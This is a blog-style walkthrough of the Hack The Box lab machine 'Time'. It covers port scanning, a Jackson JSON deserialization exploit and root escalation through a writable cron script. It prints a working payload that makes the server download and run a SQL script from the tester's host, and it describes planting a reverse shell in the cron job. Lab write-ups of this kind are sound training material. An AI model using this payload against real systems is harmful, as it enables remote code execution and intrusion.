Hackthebox Time WriteUp

Time is a medium-level machine. First the web server running java scripts that has a vulnerable Jackson library for json deserialization. After got a shell, there is a cronjob that running as root privilege and has write access for the user. With all that being said, Let’s just jump in!

root@kali:~/htb/boxes/time# nmap -T4 -A -p- -oA time -v 10.10.10.214
# Nmap 7.91 scan initiated Mon Oct 26 07:25:13 2020 as: nmap -T4 -A -p- -oA time -v 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
| 256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_ 256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Head over to port 80. And there is a Jso page.

Give it a random character for it to deserialize and see what will happen.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('`' (code 96)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

The error above indicates the server is running Jackson java script. Search related exploits and found blow one.

Create a payload named inject.sql as above screenshot form the exploit page. Then use python SimpleHttpserver hosting the payload and execute below strings for web server to execute the payload.

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.28:81/inject.sql'"}]"

Ran linpeas and found there is a (/usr/bin/timer_backup.sh) cronjob running and the user pericles has write permission.

pericles@time:/home$ ls -l /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Apr 1 12:50 /usr/bin/timer_backup.sh
pericles@time:/home$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

Run pspy to monitor all the running processes in the machine. It shows the root is executing the cronjob!

Chang the file to a reverse shell and let root to execute it.

  1. Update the Jackson java script on the server.
  2. Remove the timer_backup.sh cronjob on the machine.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP